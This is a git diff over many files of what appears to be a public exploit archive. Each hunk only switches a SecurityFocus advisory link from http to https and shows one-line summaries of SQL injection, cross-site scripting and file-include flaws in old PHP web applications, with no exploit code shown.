b/exploits/php/webapps/26634.txt index 788fb7d51..c3315d08c 100644 --- a/exploits/php/webapps/26634.txt +++ b/exploits/php/webapps/26634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15599/info +source: https://www.securityfocus.com/bid/15599/info Randshop is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26635.txt b/exploits/php/webapps/26635.txt index 45a1ebbf9..4b24081d8 100644 --- a/exploits/php/webapps/26635.txt +++ b/exploits/php/webapps/26635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15601/info +source: https://www.securityfocus.com/bid/15601/info FreeWebStat is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26636.txt b/exploits/php/webapps/26636.txt index 5622468e0..c6b7fee3d 100644 --- a/exploits/php/webapps/26636.txt +++ b/exploits/php/webapps/26636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15603/info +source: https://www.securityfocus.com/bid/15603/info PHP Web Statistik is prone to multiple content injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The vulnerabilities could allow for HTML injection and cross-site scripting attacks. diff --git a/exploits/php/webapps/26637.txt b/exploits/php/webapps/26637.txt index 370b608d1..0f9496a7e 100644 --- a/exploits/php/webapps/26637.txt +++ b/exploits/php/webapps/26637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15604/info +source: https://www.securityfocus.com/bid/15604/info Helpdesk Issue Manager is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26638.txt b/exploits/php/webapps/26638.txt index 55228dc31..9e790d189 100644 --- a/exploits/php/webapps/26638.txt +++ b/exploits/php/webapps/26638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15604/info +source: https://www.securityfocus.com/bid/15604/info Helpdesk Issue Manager is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26639.txt b/exploits/php/webapps/26639.txt index d639cde60..ef003451a 100644 --- a/exploits/php/webapps/26639.txt +++ b/exploits/php/webapps/26639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15610/info +source: https://www.securityfocus.com/bid/15610/info GuppY is affected by multiple local file include and information disclosure vulnerabilities. diff --git a/exploits/php/webapps/26640.txt b/exploits/php/webapps/26640.txt index 6e0f32e05..c2fec6231 100644 --- a/exploits/php/webapps/26640.txt +++ b/exploits/php/webapps/26640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15610/info +source: https://www.securityfocus.com/bid/15610/info GuppY is affected by multiple local file include and information disclosure vulnerabilities. diff --git a/exploits/php/webapps/26641.txt b/exploits/php/webapps/26641.txt index f5b04ac54..b7a04ace5 100644 --- a/exploits/php/webapps/26641.txt +++ b/exploits/php/webapps/26641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15610/info +source: https://www.securityfocus.com/bid/15610/info GuppY is affected by multiple local file include and information disclosure vulnerabilities. diff --git a/exploits/php/webapps/26642.txt b/exploits/php/webapps/26642.txt index f733d5399..d8a05590f 100644 --- a/exploits/php/webapps/26642.txt +++ b/exploits/php/webapps/26642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15610/info +source: https://www.securityfocus.com/bid/15610/info GuppY is affected by multiple local file include and information disclosure vulnerabilities. diff --git a/exploits/php/webapps/26643.txt b/exploits/php/webapps/26643.txt index 8b2eb9c7b..6b74ec435 100644 --- a/exploits/php/webapps/26643.txt +++ b/exploits/php/webapps/26643.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15611/info +source: https://www.securityfocus.com/bid/15611/info PHP Doc System is prone to a local file-include vulnerability. This is due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26644.txt b/exploits/php/webapps/26644.txt index 7fe982098..e3db262b2 100644 --- a/exploits/php/webapps/26644.txt +++ b/exploits/php/webapps/26644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15612/info +source: https://www.securityfocus.com/bid/15612/info SearchSolutions SearchFeed, RevenuePilot, and Google API are prone to cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26645.txt b/exploits/php/webapps/26645.txt index 8ae5cdce8..d93eaca88 100644 --- a/exploits/php/webapps/26645.txt +++ b/exploits/php/webapps/26645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15617/info +source: https://www.securityfocus.com/bid/15617/info ASP-Rider is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26646.txt b/exploits/php/webapps/26646.txt index 2579aa02f..36dd70d58 100644 --- a/exploits/php/webapps/26646.txt +++ b/exploits/php/webapps/26646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15621/info +source: https://www.securityfocus.com/bid/15621/info PHP Upload Center is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26647.txt b/exploits/php/webapps/26647.txt index b70aa623e..9117ac8c7 100644 --- a/exploits/php/webapps/26647.txt +++ b/exploits/php/webapps/26647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15622/info +source: https://www.securityfocus.com/bid/15622/info Fantastic News is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26649.txt b/exploits/php/webapps/26649.txt index 13fab13f5..2a071cf3f 100644 --- a/exploits/php/webapps/26649.txt +++ b/exploits/php/webapps/26649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15628/info +source: https://www.securityfocus.com/bid/15628/info DMANews is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26650.txt b/exploits/php/webapps/26650.txt index b8d7d2b63..1996b253d 100644 --- a/exploits/php/webapps/26650.txt +++ b/exploits/php/webapps/26650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15631/info +source: https://www.securityfocus.com/bid/15631/info Entergal MX is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26651.txt b/exploits/php/webapps/26651.txt index d12e46a37..2737759f3 100644 --- a/exploits/php/webapps/26651.txt +++ b/exploits/php/webapps/26651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15632/info +source: https://www.securityfocus.com/bid/15632/info BosDates is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26652.txt b/exploits/php/webapps/26652.txt index d88568e8e..794ffa0cc 100644 --- a/exploits/php/webapps/26652.txt +++ b/exploits/php/webapps/26652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15633/info +source: https://www.securityfocus.com/bid/15633/info Post Affiliate Pro is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26653.txt b/exploits/php/webapps/26653.txt index f57738f58..2dc99e282 100644 --- a/exploits/php/webapps/26653.txt +++ b/exploits/php/webapps/26653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15634/info +source: https://www.securityfocus.com/bid/15634/info GhostScripter Amazon Shop is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26654.txt b/exploits/php/webapps/26654.txt index 1b6873ec9..8d31fcc98 100644 --- a/exploits/php/webapps/26654.txt +++ b/exploits/php/webapps/26654.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15635/info +source: https://www.securityfocus.com/bid/15635/info KBase Express is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26655.txt b/exploits/php/webapps/26655.txt index c41ef559a..d88604980 100644 --- a/exploits/php/webapps/26655.txt +++ b/exploits/php/webapps/26655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15636/info +source: https://www.securityfocus.com/bid/15636/info ltwCalendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26656.txt b/exploits/php/webapps/26656.txt index f67ab9778..4fcbfed16 100644 --- a/exploits/php/webapps/26656.txt +++ b/exploits/php/webapps/26656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15637/info +source: https://www.securityfocus.com/bid/15637/info Orca Knowledgebase is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26657.txt b/exploits/php/webapps/26657.txt index 1bb5f4d82..9eacafcf5 100644 --- a/exploits/php/webapps/26657.txt +++ b/exploits/php/webapps/26657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15638/info +source: https://www.securityfocus.com/bid/15638/info Orca Blog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26658.txt b/exploits/php/webapps/26658.txt index 2d76e7432..1eda20112 100644 --- a/exploits/php/webapps/26658.txt +++ b/exploits/php/webapps/26658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15639/info +source: https://www.securityfocus.com/bid/15639/info Orca Ringmaker is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26659.txt b/exploits/php/webapps/26659.txt index a1c89e262..c023bd71f 100644 --- a/exploits/php/webapps/26659.txt +++ b/exploits/php/webapps/26659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15640/info +source: https://www.securityfocus.com/bid/15640/info FAQ System is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26660.txt b/exploits/php/webapps/26660.txt index 9caa5c791..1a51c7fbd 100644 --- a/exploits/php/webapps/26660.txt +++ b/exploits/php/webapps/26660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15640/info +source: https://www.securityfocus.com/bid/15640/info FAQ System is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26661.txt b/exploits/php/webapps/26661.txt index 4084c9ab4..75444f05d 100644 --- a/exploits/php/webapps/26661.txt +++ b/exploits/php/webapps/26661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15641/info +source: https://www.securityfocus.com/bid/15641/info Survey System is prone to multiple SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26662.php b/exploits/php/webapps/26662.php index f9b815de6..47cdd7c08 100644 --- a/exploits/php/webapps/26662.php +++ b/exploits/php/webapps/26662.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15643/info +source: https://www.securityfocus.com/bid/15643/info N-13 News is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26663.txt b/exploits/php/webapps/26663.txt index 2bc8c3320..f724d7e46 100644 --- a/exploits/php/webapps/26663.txt +++ b/exploits/php/webapps/26663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15644/info +source: https://www.securityfocus.com/bid/15644/info DRZES HMS is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before it is used in SQL queries. diff --git a/exploits/php/webapps/26667.txt b/exploits/php/webapps/26667.txt index ace3885b3..daf0ed18f 100644 --- a/exploits/php/webapps/26667.txt +++ b/exploits/php/webapps/26667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15650/info +source: https://www.securityfocus.com/bid/15650/info SocketKB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26668.txt b/exploits/php/webapps/26668.txt index af4e34ec3..28453f734 100644 --- a/exploits/php/webapps/26668.txt +++ b/exploits/php/webapps/26668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15651/info +source: https://www.securityfocus.com/bid/15651/info phpAlbum is prone to a local file-include vulnerability. diff --git a/exploits/php/webapps/26669.txt b/exploits/php/webapps/26669.txt index 0d6c499b8..1a0b126b9 100644 --- a/exploits/php/webapps/26669.txt +++ b/exploits/php/webapps/26669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15652/info +source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26670.txt b/exploits/php/webapps/26670.txt index abdc418f9..e5d86db25 100644 --- a/exploits/php/webapps/26670.txt +++ b/exploits/php/webapps/26670.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15652/info +source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26671.txt b/exploits/php/webapps/26671.txt index 372f0dced..a8dfd27ad 100644 --- a/exploits/php/webapps/26671.txt +++ b/exploits/php/webapps/26671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15652/info +source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26672.txt b/exploits/php/webapps/26672.txt index 615df9a9d..a8fe1ee4a 100644 --- a/exploits/php/webapps/26672.txt +++ b/exploits/php/webapps/26672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15652/info +source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26673.txt b/exploits/php/webapps/26673.txt index 59c24d24b..6785b14cc 100644 --- a/exploits/php/webapps/26673.txt +++ b/exploits/php/webapps/26673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26674.txt b/exploits/php/webapps/26674.txt index 18936fac9..444140d6e 100644 --- a/exploits/php/webapps/26674.txt +++ b/exploits/php/webapps/26674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26675.txt b/exploits/php/webapps/26675.txt index 02a6cd935..a9892baa3 100644 --- a/exploits/php/webapps/26675.txt +++ b/exploits/php/webapps/26675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26676.txt b/exploits/php/webapps/26676.txt index c9e0c1ae6..1f1b8bd64 100644 --- a/exploits/php/webapps/26676.txt +++ b/exploits/php/webapps/26676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26677.txt b/exploits/php/webapps/26677.txt index a727ba926..a6d63ea9f 100644 --- a/exploits/php/webapps/26677.txt +++ b/exploits/php/webapps/26677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26678.txt b/exploits/php/webapps/26678.txt index 0f321a623..2e548f9ef 100644 --- a/exploits/php/webapps/26678.txt +++ b/exploits/php/webapps/26678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15655/info +source: https://www.securityfocus.com/bid/15655/info FAQRing is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26679.txt b/exploits/php/webapps/26679.txt index 62f486114..e89636c42 100644 --- a/exploits/php/webapps/26679.txt +++ b/exploits/php/webapps/26679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15656/info +source: https://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26680.txt b/exploits/php/webapps/26680.txt index c138e7f7c..705f4755b 100644 --- a/exploits/php/webapps/26680.txt +++ b/exploits/php/webapps/26680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15656/info +source: https://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26681.txt b/exploits/php/webapps/26681.txt index 77f841352..85e2a3111 100644 --- a/exploits/php/webapps/26681.txt +++ b/exploits/php/webapps/26681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15656/info +source: https://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26683.txt b/exploits/php/webapps/26683.txt index 9a0527819..cf1f4bb7c 100644 --- a/exploits/php/webapps/26683.txt +++ b/exploits/php/webapps/26683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15657/info +source: https://www.securityfocus.com/bid/15657/info O-Kiraku Nikki is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26684.txt b/exploits/php/webapps/26684.txt index 17446ba0b..5d13f01f4 100644 --- a/exploits/php/webapps/26684.txt +++ b/exploits/php/webapps/26684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15658/info +source: https://www.securityfocus.com/bid/15658/info 88Scripts Event Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26685.txt b/exploits/php/webapps/26685.txt index 9e3316d4b..62bd3b8e5 100644 --- a/exploits/php/webapps/26685.txt +++ b/exploits/php/webapps/26685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15659/info +source: https://www.securityfocus.com/bid/15659/info Instant Photo Gallery is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26686.txt b/exploits/php/webapps/26686.txt index e2bd47369..3b2091947 100644 --- a/exploits/php/webapps/26686.txt +++ b/exploits/php/webapps/26686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15659/info +source: https://www.securityfocus.com/bid/15659/info Instant Photo Gallery is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26687.txt b/exploits/php/webapps/26687.txt index ce8e00d2b..cd073fb58 100644 --- a/exploits/php/webapps/26687.txt +++ b/exploits/php/webapps/26687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15662/info +source: https://www.securityfocus.com/bid/15662/info WebCalendar is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26688.php b/exploits/php/webapps/26688.php index a81fe3a55..7300c79b8 100644 --- a/exploits/php/webapps/26688.php +++ b/exploits/php/webapps/26688.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15665/info +source: https://www.securityfocus.com/bid/15665/info Lore is prone to an SQL injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26689.txt b/exploits/php/webapps/26689.txt index ecf13cba5..79f42cb47 100644 --- a/exploits/php/webapps/26689.txt +++ b/exploits/php/webapps/26689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15667/info +source: https://www.securityfocus.com/bid/15667/info DotClear is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26691.txt b/exploits/php/webapps/26691.txt index 9975a0557..64897ff92 100644 --- a/exploits/php/webapps/26691.txt +++ b/exploits/php/webapps/26691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15673/info +source: https://www.securityfocus.com/bid/15673/info WebCalendar is prone to an HTTP response-splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26692.txt b/exploits/php/webapps/26692.txt index d5ba12f5f..3e06dbb21 100644 --- a/exploits/php/webapps/26692.txt +++ b/exploits/php/webapps/26692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15675/info +source: https://www.securityfocus.com/bid/15675/info Extreme Search Corporate Edition is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26693.txt b/exploits/php/webapps/26693.txt index fe05fd9cf..78a18a57c 100644 --- a/exploits/php/webapps/26693.txt +++ b/exploits/php/webapps/26693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15676/info +source: https://www.securityfocus.com/bid/15676/info Trac is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26694.txt b/exploits/php/webapps/26694.txt index 7b2daf5df..d756126b9 100644 --- a/exploits/php/webapps/26694.txt +++ b/exploits/php/webapps/26694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15679/info +source: https://www.securityfocus.com/bid/15679/info phpMyChat is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26695.txt b/exploits/php/webapps/26695.txt index a9886ed1d..cedb4b9c0 100644 --- a/exploits/php/webapps/26695.txt +++ b/exploits/php/webapps/26695.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15679/info +source: https://www.securityfocus.com/bid/15679/info phpMyChat is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26696.txt b/exploits/php/webapps/26696.txt index 13cbb4d83..6be551111 100644 --- a/exploits/php/webapps/26696.txt +++ b/exploits/php/webapps/26696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15679/info +source: https://www.securityfocus.com/bid/15679/info phpMyChat is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26697.php b/exploits/php/webapps/26697.php index 5dcd0098f..bd5156fb8 100644 --- a/exploits/php/webapps/26697.php +++ b/exploits/php/webapps/26697.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15680/info +source: https://www.securityfocus.com/bid/15680/info PHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26698.txt b/exploits/php/webapps/26698.txt index 02836de69..5be792cb5 100644 --- a/exploits/php/webapps/26698.txt +++ b/exploits/php/webapps/26698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15683/info +source: https://www.securityfocus.com/bid/15683/info NetClassifieds is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26699.txt b/exploits/php/webapps/26699.txt index 941011100..566ce2da5 100644 --- a/exploits/php/webapps/26699.txt +++ b/exploits/php/webapps/26699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15683/info +source: https://www.securityfocus.com/bid/15683/info NetClassifieds is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26706.txt b/exploits/php/webapps/26706.txt index cd0e4afd0..c7f18ca35 100644 --- a/exploits/php/webapps/26706.txt +++ b/exploits/php/webapps/26706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15698/info +source: https://www.securityfocus.com/bid/15698/info PHP-Fusion is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26707.txt b/exploits/php/webapps/26707.txt index 100373cf5..38e066ff9 100644 --- a/exploits/php/webapps/26707.txt +++ b/exploits/php/webapps/26707.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15699/info +source: https://www.securityfocus.com/bid/15699/info Alisveristr E-commerce is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26713.txt b/exploits/php/webapps/26713.txt index b4b005908..eff4c5182 100644 --- a/exploits/php/webapps/26713.txt +++ b/exploits/php/webapps/26713.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15700/info +source: https://www.securityfocus.com/bid/15700/info phpYellowTM is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26714.txt b/exploits/php/webapps/26714.txt index 3a76a7979..bf6d952bd 100644 --- a/exploits/php/webapps/26714.txt +++ b/exploits/php/webapps/26714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15700/info +source: https://www.securityfocus.com/bid/15700/info phpYellowTM is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26715.txt b/exploits/php/webapps/26715.txt index 29b18f2a8..5b6089433 100644 --- a/exploits/php/webapps/26715.txt +++ b/exploits/php/webapps/26715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15701/info +source: https://www.securityfocus.com/bid/15701/info Widget Press Widget Property is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26717.txt b/exploits/php/webapps/26717.txt index 79f3923a0..08b99b066 100644 --- a/exploits/php/webapps/26717.txt +++ b/exploits/php/webapps/26717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15707/info +source: https://www.securityfocus.com/bid/15707/info eCommerce Enterprise Edition is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26718.txt b/exploits/php/webapps/26718.txt index 3d9b61b74..3ab2b4063 100644 --- a/exploits/php/webapps/26718.txt +++ b/exploits/php/webapps/26718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15707/info +source: https://www.securityfocus.com/bid/15707/info eCommerce Enterprise Edition is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26719.txt b/exploits/php/webapps/26719.txt index b3188b1b2..bfcc67d81 100644 --- a/exploits/php/webapps/26719.txt +++ b/exploits/php/webapps/26719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15707/info +source: https://www.securityfocus.com/bid/15707/info eCommerce Enterprise Edition is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26720.txt b/exploits/php/webapps/26720.txt index 3dedde2eb..bbdbd3f0a 100644 --- a/exploits/php/webapps/26720.txt +++ b/exploits/php/webapps/26720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15709/info +source: https://www.securityfocus.com/bid/15709/info Landshop is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26722.txt b/exploits/php/webapps/26722.txt index 7d4a75b80..67fa4d3c0 100644 --- a/exploits/php/webapps/26722.txt +++ b/exploits/php/webapps/26722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15713/info +source: https://www.securityfocus.com/bid/15713/info Hobosworld HobSR is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26723.txt b/exploits/php/webapps/26723.txt index 0e9aa5854..c887ac38f 100644 --- a/exploits/php/webapps/26723.txt +++ b/exploits/php/webapps/26723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15714/info +source: https://www.securityfocus.com/bid/15714/info Relative Real Estate Systems is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26724.txt b/exploits/php/webapps/26724.txt index c1801f626..0a015923b 100644 --- a/exploits/php/webapps/26724.txt +++ b/exploits/php/webapps/26724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15715/info +source: https://www.securityfocus.com/bid/15715/info eDating Professional is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an 